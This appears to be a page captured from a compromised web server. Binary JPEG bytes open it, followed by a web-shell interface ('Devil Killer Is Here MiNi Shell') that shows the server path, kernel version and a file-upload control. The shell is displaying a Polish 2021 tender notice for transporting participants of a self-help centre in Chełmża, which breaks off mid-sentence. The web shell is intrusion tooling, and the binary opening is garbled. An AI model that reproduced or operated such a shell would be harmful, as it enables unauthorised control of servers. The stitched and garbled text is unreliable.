JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210615/0008346201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00083462 z dnia 2021-06-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Dowóz uczestników ŚDS na zajęcia z miejsca zamieszkania<br/>do placówki i odwóz z placówki do miejsca zamieszkania” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ŚRODOWISKOWY DOM SAMOPOMOCY W CHEŁMŻY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 341518336</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. gen. Józefa Hallera 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełmża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566757861</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sds.chelmza@post.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiattorunski.pl/7576,srodowiskowy-dom-samopomocy</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Centrum Usług Wspólnych Powiatu Toruńskiego w Browinie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">365566575</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Browina 59</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Chełmża</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">87-140</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">56 645 98 89</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@cuw.powiattorunski.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://www.bip.powiattorunski.pl/8247,centrum-uslug-wspolnych-powiatu-torunskiego-w-browinie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dowóz uczestników ŚDS na zajęcia z miejsca zamieszkania<br/>do placówki i odwóz z placówki do miejsca zamieszkania” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-02787a40-cd5b-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00083462</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002929/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczestników ŚDS na zajęcia z miejsca zamieszkania do placówki i odwóz z placówki do miejsca zamieszkania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiattorunski.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Ofertę, a także oświadczenie, o jakich mowa w SWZ, składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub podpisem<br/>osobistym. Zawiadomienia, oświadczenia, wnioski (np. o wyjaśnienie treści SWZ) lub informacje Wykonawcy przekazują: <br/>1) drogą elektroniczną: zamowienia@cuw.powiattorunski.pl, <br/>2) poprzez Platformę Przetargową, dostępną pod adresem: https://powiattorunski.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wymagania techniczne, jakim musi odpowiadać sprzęt komputerowych Wykonawcy, aby móc<br/>korzystać z Platformy: <br/><br/>a) Dopuszczalne przeglądarki internetowe:- Internet Explorer 8, Internet<br/>Explorer 9, Internet Explorer 10, Internet Explorer 11,- Google Chrome 31- Mozilla Firefox 26- Opera<br/>182) <br/><br/>b) Pozostałe wymagania techniczne:- dostęp do sieci Internet;- obsługa przez przeglądarkę<br/>protokołu XMLHttpRequest – ajax;- włączona obsługa JavaScript;- zalecana szybkość łącza<br/>internetowego powyżej 500 KB/s;- zainstalowany Acrobat Reader;- zainstalowane środowisko<br/>uruchomieniowe Java-Java SE Runtime Environment 6Update 24 lub nowszy.<br/><br/>2) Osobą uprawnioną do porozumiewania się z Wykonawcami jest: Marcin Łowicki, <br/>e-mail: zamowienia@cuw.powiattorunski.pl <br/><br/>3)W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania tj. CUW.272.9.2021.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/W – ogólne rozporządzenie o ochronie danych, informujemy, iż: Administratorem, czyli podmiotem decydującym o tym jak będą wykorzystane Twoje dane osobowe jest, Dyrektor Środowiskowego Domu Samopomocy w Chełmży z siedzibą na ul. Hallera 25, 87-140 Chełmża (dalej „My”, „Zamawiający”). Możesz się z nim kontaktować w następujący sposób: listownie na adres podany wyżej, e-mailowo<br/>sds.chelmza@post.pl; telefonicznie 56 675 78 61.<br/>Inspektor danych osobowych: agmarhanc@wp.pl<br/>Przetwarzamy Twoje dane osobowe, ponieważ jest to niezbędne do zawarcia i wykonania umowy w<br/>sprawie zamówienia publicznego zawartej z Tobą, w tym do kontaktowania się z Tobą w celu realizacji<br/>umowy, jak również w celu archiwizacyjnym.<br/>Wymagamy podania przez Ciebie następujących danych<br/>osobowych, aby móc zawrzeć i wykonać umowę zawartą z Tobą:<br/>− nazwę (firmę) – imię i nazwisko w przypadku wykonawcy będącego osobą fizyczną,<br/>− adres wykonawcy,<br/>− adres email,<br/>− imię i nazwisko osoby wyznaczonej przez Ciebie do kontaktu.<br/>Jeśli z jakiegoś powodu nie podasz tych danych osobowych, niestety nie będziemy mogli zawrzeć z<br/>Tobą umowy. Jeśli wymagają tego przepisy prawa, możemy wymagać od Ciebie podania innych niezbędnych danych np. względów rachunkowych lub podatkowych. Poza tymi przypadkami podanie Twoich danych jest dobrowolne.<br/> Gwarantujemy Tobie prawo dostępu do Twoich danych i ich sprostowania, wynikające z ogólnego rozporządzenia o ochronie danych.<br/>Z uprawnień tych możesz skorzystać w odniesieniu do żądania sprostowania danych - zauważysz że Twoje dane są nieprawidłowe lub niekompletne, lub zostaniesz wezwany przez Zamawiającego do ich<br/>sprostowania. Masz prawo wnieść skargę w związku z przetwarzaniem przez Zamawiającego Twoich danych osobowych do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych (adres: Prezes UODO ul. Stawki 2, 00-193 Warszawa).<br/> Twoje dane osobowe udostępniamy dostawcom: systemu<br/>elektronicznego obiegu dokumentów, poczty elektronicznej, usług IT oraz podmiotom wspierającym<br/>nas w świadczeniu usług drogą elektroniczną, czyli takim, które zapewniając usługi płatnicze. Możemy<br/>przekazać Twoje dane osobowe organom publicznym, każdemu kto skorzysta z prawa dostępu do<br/>informacji publicznej, a także na wystąpienie o udostępnienie protokołu wraz z załącznikami zgodnie z<br/>ustawą Prawo zamówień publicznych.<br/> Przechowujemy Twoje dane osobowe przez czas<br/>obowiązywania umowy zawartej z Tobą, a także po jej zakończeniu w celach:<br/>− dochodzenia roszczeń w związku z wykonywaniem umowy,<br/>− wykonywania obowiązków wynikających z przepisów prawa, w tym w szczególności<br/>podatkowych i rachunkowych,<br/>− archiwizacyjnych – maksymalnie przez okres 10 lat od dnia zakończenia wykonania umowy.<br/>Twoje dane osobowe nie będą przekazywane poza Europejski Obszar Gospodarczy.<br/> Twoje dane osobowe nie będą przetwarzane w sposób zautomatyzowany.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.ZP.272.9.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dowóz uczestników Środowiskowego Domu<br/>Samopomocy w Chełmży (dalej ŚDS) na zajęcia z miejsca zamieszkania<br/>do placówki i odwóz z placówki do miejsca zamieszkania w okresie od 01.07.2021 r.<br/>do 30.06.2022 r.<br/><br/>Opis wymagań jakościowych odnoszących się co najmniej do głównych elementów<br/>składających się na przedmiot zamówienia – transport musi odbywać się w<br/>określonych minimalnych warunków jakościowych określonych za pomocą<br/>dookreślonego środku transportu.<br/><br/>Wymagana jest fabryczna homologacja pojazdu bazowego oraz homologacja<br/>pojazdu do przewozu osób z niepełnosprawnością lub badanie techniczne<br/>potwierdzające przystosowanie pojazdu do przewozu osób<br/>z niepełnosprawnością: możliwość przewożenia osoby na wózku inwalidzkim.<br/>10.2.2.Wiek pojazdu – nie starszy niż rocznik 2000<br/>10.2.3.Zasoby:<br/>10.2.3.1. Przynajmniej jeden pojazd – przystosowany do przewozu osób<br/>z niepełnosprawnością poruszających się na wózkach inwalidzkich<br/>10.2.3.2. Przynajmniej dwa pojazdy muszą posiadać dodatkowy schodek<br/>umożliwiający wsiadanie osobom z niepełnosprawnością<br/>Oferent musi łącznie dysponować minimum trzema pojazdami.<br/>10.2.4.W celu zapewnienie wysokiej jakości komfortu podróży potencjalni oferenci<br/>muszą dysponować przynajmniej trzema pojazdami do przewozu osób<br/>spełniającymi ww. wymagania. Przynajmniej jeden pojazd musi być<br/>przystosowany do przewozu osób z niepełnosprawnością poruszających się na<br/>wózkach inwalidzkich.<br/>10.3.Przedmiot zamówienia musi być realizowany zgodnie z przepisami obowiązującego<br/>prawa, obowiązujących norm, warunków, przepisów bhp, ppoż. i wytycznych<br/>Zamawiającego oraz inne niezbędne do należytego wykonywania przedmiotu<br/>zamówienia z zapewnieniem optymalnego bezpieczeństwa podróżnych.<br/>10.4.Użyte pojazdy muszą spełniać wymagania określone przez Zamawiającego,<br/>posiadać dopuszczenia do ruchu drogowego, aktualne badania i przeglądy -<br/>zapewniać pełną sprawność techniczną, użytkową i eksploatacyjną.<br/>10.5.Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach<br/>opisanych w SWZ i w załącznikach stanowiących integralną część SWZ oraz na<br/>zasadach opisanych w umowie.<br/>10.6.Oznaczenie przedmiotu zamówienia według kodu Wspólnego Słownika Zamówień<br/>CPV: 60130000-8 – usługi w zakresie specjalistycznego transportu drogowego osób </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z prawa opcji. Prawo opcji polegać będzie na świadczeniu tożsamych usług. Zamawiający przewiduje możliwość skorzystania z prawa opcji i przedłużenia Umowy po zakończeniu pierwotnego terminu realizacji Umowy (12 miesięcy) przez okres nie dłuższy niż 12 miesięcy (3 razy po 4 miesięcy) wg następującego porządku: <br/><br/>a)	Opcja nr 1 – na okres 4 miesięcy -Zamawiający może zastosować prawo opcji po upływie pierwotnego terminu realizacji Umowy. <br/><br/>b)	Opcja nr 2 – na okres 4 miesięcy – Zamawiający może zastosować prawo opcji po upływie pierwotnego terminu realizacji Umowy oraz po wykorzystaniu Opcji nr 1. <br/><br/>c)	Opcja nr 3 – na okres 4 miesięcy Zamawiający może zastosować prawo opcji po upływie pierwotnego terminu realizacji Umowy oraz wykorzystaniu z Opcji nr 1 i Opcji nr 2 Czas trwania usługi podstawowej 12 miesięcy i każda z 3 opcji 4 miesięcy licząc od zakończenia poprzedniej usługi. <br/><br/>Jeżeli Zamawiający skorzysta z prawa opcji nr 1, 2 lub 3 przedłużona umowa będzie obowiązywała przez okres 4 miesięcy dla każdej opcji. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Dowóz uczestników Środowiskowego Domu Samopomocy w Chełmży (dalej ŚDS) na zajęcia z miejsca zamieszkania do placówki i odwóz z placówki do miejsca zamieszkania. Szacowany roczny przebieg - 79 000 km. <br/>Warunki tożsame z danym postępowaniem.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">28.1.	Wykonawca wskaże w ofercie zryczałtowaną cenę za 1 km usługi przewozu, z uwzględnieniem wszystkich kosztów niezbędnych do wykonania usługi. Powrót z miejsca dowozu, dojazd z bazy na trasy i zjazdy z tras do bazy oraz dojazd i zjazd samochodu zamiennego nie będą odrębnie opłacane i nie są ujęte w podanej średniej ilości km do realizacji na danej trasie.<br/>28.2.	Cena – należy przez to rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 ustawy z dnia 5 lipca 2001 r. ustawy z dnia 9 maja 2014 r. o informowaniu o cenach towarów i usług (Dz.U. z 2019 r. poz.178).<br/>28.3.	Całkowita cena łączna brutto za wykonywanie usług w całym okresie obowiązywania umowy, będzie obliczoną jako stawki jednostkowej za 1 km podanej w ofercie oraz szacowanej łącznej ilości km.<br/>28.4.	Wartość ta będzie stanowiła cenę oferty służącą do porównania i oceny ofert. Rozliczenie zamówienia będzie się odbywało, według faktycznie wykonanych usług, na podstawie wskazanych w ofercie stawek jednostkowych, zgodnie z wzorem umowy. Dojazdy z bazy na trasy i zjazdy z tras do bazy oraz dojazd i zjazd samochodu zamiennego nie będą odrębnie opłacane, ani nie są ujmowane w podanych średnio km. <br/>28.5.	Rozliczenia za wykonane usługi realizowane będą w okresach miesięcznych, w polskich złotych, na podstawie faktur VAT, wystawianych przez wykonawcę w oparciu o kartę wykonanych przewozów w danym miesiącu. <br/>28.6.	W cenie należy uwzględnić w szczególności: <br/>28.7.	koszty zatrudnienia personelu w liczbie wymaganej przez Zamawiającego, w tym: obowiązku zatrudnienia pracowników na podstawie umowy o pracę, z uwzględnieniem przepisów o minimalnym wynagrodzeniu i minimalnej stawce godzinowej, ubezpieczeń społecznych i zdrowotnych, <br/>28.8.	koszty utrzymania środków transportu, w tym koszty ubezpieczeń komunikacyjnych, opłat, podatków, <br/>28.9.	podatek VAT, <br/>28.10.	inne koszty niezbędne do prawidłowej realizacji usługi, w tym w szczególności koszty dojazdu z bazy do początku trasy i powrotu z końca trasy.<br/>28.11.	Wykonawca, składając ofertę, informuje Zamawiającego, czy wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego, wskazując nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego powstania, oraz wskazując ich wartość bez kwoty podatku (jeśli tak - Wykonawca przedkłada stosowne oświadczenie). Nie złożenie oświadczenia oznaczać będzie, że złożenie oferty nie prowadzi do powstania u zamawiającego obowiązku podatkowego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/><br/>20.1.1.nie podlegają wykluczeniu, o którym mowa w art. 108 ustawy PZP.<br/>20.1.2.spełniają warunki, dotyczące:<br/><br/>20.1.2.1. zdolności do występowania w obrocie gospodarczym: Zamawiający<br/>nie stawia warunku w powyższym zakresie.<br/>20.1.2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów: Wykonawca<br/>posiada licencje do przewozu osób w krajowym transporcie drogowym<br/>wymagane ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j.:<br/>Dz. U. z 2019 r., poz. 2140 z późn. zm.).<br/>20.1.2.3. sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia<br/>warunku w powyższym zakresie.<br/><br/>20.2. zdolności technicznej lub zawodowej:<br/>20.2.1.Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania<br/>ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych –<br/>wykonuje w ramach jednej umowy, co najmniej jedną usługę trwającą przez<br/>okres co najmniej 60 dni, polegającą na świadczeniu usługi przewozu osób<br/>(usługi transportu krajowego) - dla grupy osób, w tym 2 osób poruszających<br/>się na wózkach inwalidzkich.<br/><br/>20.2.2.Wykonawca posiada min. 3 pojazdy, nie starsze niż z 2000 r.: dwa z<br/>dodatkowym schodkiem/stopniem zapewniające należyte wykonanie<br/>przedmiotu zamówienia oraz min. 1 pojazd zapewniający możliwość<br/>przewozu osób poruszających się na wózkach.<br/>Wszystkie pojazdy muszą zapewniając należyte wykonanie przedmiotu<br/>zamówienia. <br/><br/>20.2.3.Wymagana jest fabryczna homologacja pojazdu bazowego oraz homologacja<br/>pojazdu do przewozu osób z niepełnosprawnością lub badanie techniczne<br/>potwierdzające przystosowanie pojazdu do przewozu osób z<br/>niepełnosprawnością: możliwość przewożenia osoby na wózku inwalidzkim <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 